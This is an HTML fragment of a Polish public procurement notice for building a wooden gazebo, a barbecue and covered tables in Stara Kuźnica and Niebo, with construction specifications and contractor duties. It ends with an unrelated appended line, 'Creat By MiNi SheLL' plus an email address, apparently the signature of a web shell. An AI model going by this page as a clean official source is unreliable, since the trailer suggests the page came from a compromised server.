<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Uzupełnienie infrastruktury turystycznej w miejscowościach Stara Kuźnica i Niebo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie dotyczy uzupełnienia istniejącej infrastruktury:
Stara Kuźnica - altana rekreacyjna o powierzchni 25 m2 (konstrukcja drewniana, dostosowana do istniejącej altany na tej działce). Podłogą altany będzie kostka brukowa 
o gr. 6 cm z opaską 0,5 m. W altanie zamontowany będzie stół drewniany i dwie ławy siedziskowe. W ramach zamówienia Wykonawca wybuduje grilla według wytycznych Zamawiającego (w załączeniu zdjęcie grilla którego trzeba rozbudować o wędzarkę i płytę żeliwną z 4 fajerkami). Usytuowanie należy uzgodnić z Zamawiającym.
Elementy pionowe - słupy o przekroju o przekroju 22x22 cm; krawędzie słupa
fazowane - po 1 cm na narożnikach; reszta słupa - wycięta do przekroju 18x18 cm. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie;
zabezpieczone izolacją przeciwwilgociową (smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,50 m powyżej p.t.
Dach altany czterospadowy o konstrukcji krokwiowo-belkowej, pokryty gontem
o grubości 2,5 cm. Deski gontowe mocowane do łat o przekroju prostokątnym 8x6 cm. Łaty mocowane do krokwi o przekroju 14x12 cm. Krokwie stężone jętkami o przekroju 10x8 cm. Krokwie oparte na belkach pułapowych o przekroju 22x18 cm. Ozdobne miecze o gr. 10 cm mocowane do słupów i belek pułapowych za pomocą złącza ciesielskiego.
Niebo - dwa drewniane stoły z zadaszeniem (dostosowane do istniejącego zagospodarowania). Usytuowanie należy uzgodnić z Zamawiającym.
Element pionowy - słupy wykonany z belki o przekroju 18x18 cm; krawędzie
słupa fazowane - po 1 cm na narożnikach. Drewno impregnowane środkiem odpornym na grzyby, owady i pleśnienie; zabezpieczone izolacją przeciwwilgociową (smoła lub lepik), wystawioną na 20 cm powyżej poziomu terenu. Wysokość słupa - 2,95 m
powyżej p.t.
Dach na planie kwadratu, czterospadowy, pokryty gontem o gr. 2,5 cm. Pokrycie
dachu mocowane do łat o przekroju prostokątnym 6x4 cm. Łaty mocowane do krokwi 
o przekroju 10x8 cm. Krokwie podpierane przez zastrzały o przekroju 8x6 cm,
mocowane do słupa na wysokości 2 m p.pt. Belki tworzące ramę zadaszenia i belki wspierające, mocowane do ramy za pomocą złącza ciesielskiego o przekroju 10x8 cm.
Konstrukcja blatu stołu - foszt o gr. 10 cm, szer. 25 cm i dł. 100 cm, mocowane
do belek o przekroju 10x8 cm. Belki te mocowane są do słupa i wsparte dodatkowo belkami wspornikowymi o przekroju 8x8 cm. Dwa foszty wewnętrzne wycięte w
miejscu styku ze słupem. Do zadaszonego stołu dostawiane ławki (od 2 do 4 szt.) z oparciem lub bez.
Szczegóły określa załączona dokumentacja techniczna w tym przedmiar robót stanowiący materiał informacyjno-pomocniczy.


1.	Jeżeli w SIWZ lub załącznikach została wskazana nazwa producenta, znak towarowy, patent lub pochodzenie w stosunku do określonych materiałów, urządzeń, itp. Zamawiający wymaga aby traktować takie wskazanie jako przykładowe i dopuszcza zastosowanie przy realizacji zamówienia materiałów, urządzeń równoważnych o parametrach nie gorszych niż wskazane w dokumentacji technicznej.
2.	Dopuszcza się rozwiązania równoważne opisywane za pomocą norm, aprobat, specyfikacji technicznych lub systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy pzp.
3.	Wypełnić obowiązki wynikające z decyzji Nr BP.6740.520.2013.JJ zatwierdzającej projekt budowlany i udzielającej pozwolenia na budowę  - dot. zadania 1
4.	Przed rozpoczęciem robót należy opracować Projekt organizacji ruchu na czas prowadzenia robót i przedłożyć go do zatwierdzenia przez właściwe organy administracyjne.
5.	Obowiązkiem Wykonawcy Robót jest zawiadomienie zainteresowanych właścicieli działek i budynków o terminach prowadzenia robót i ograniczeniach ruchu kołowego (pisma i tablice informacyjne).
6.	O planowanym terminie wykonania wykopów należy zawiadomić Użytkowników istniejących rurociągów i kabli.
7.	Zakończone prace należy zgłosić do odbioru wraz z dokumentacją powykonawczą zawierającą m.in. inwentaryzację geodezyjną powykonawczą co najmniej 14 dni przed planowanym odbiorem.
8.	Każdy z Wykonawców winien odwiedzić miejsce budowy celem sprawdzenia warunków placu budowy oraz warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
9.	Koszty odwiedzania miejsca budowy poniesie Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com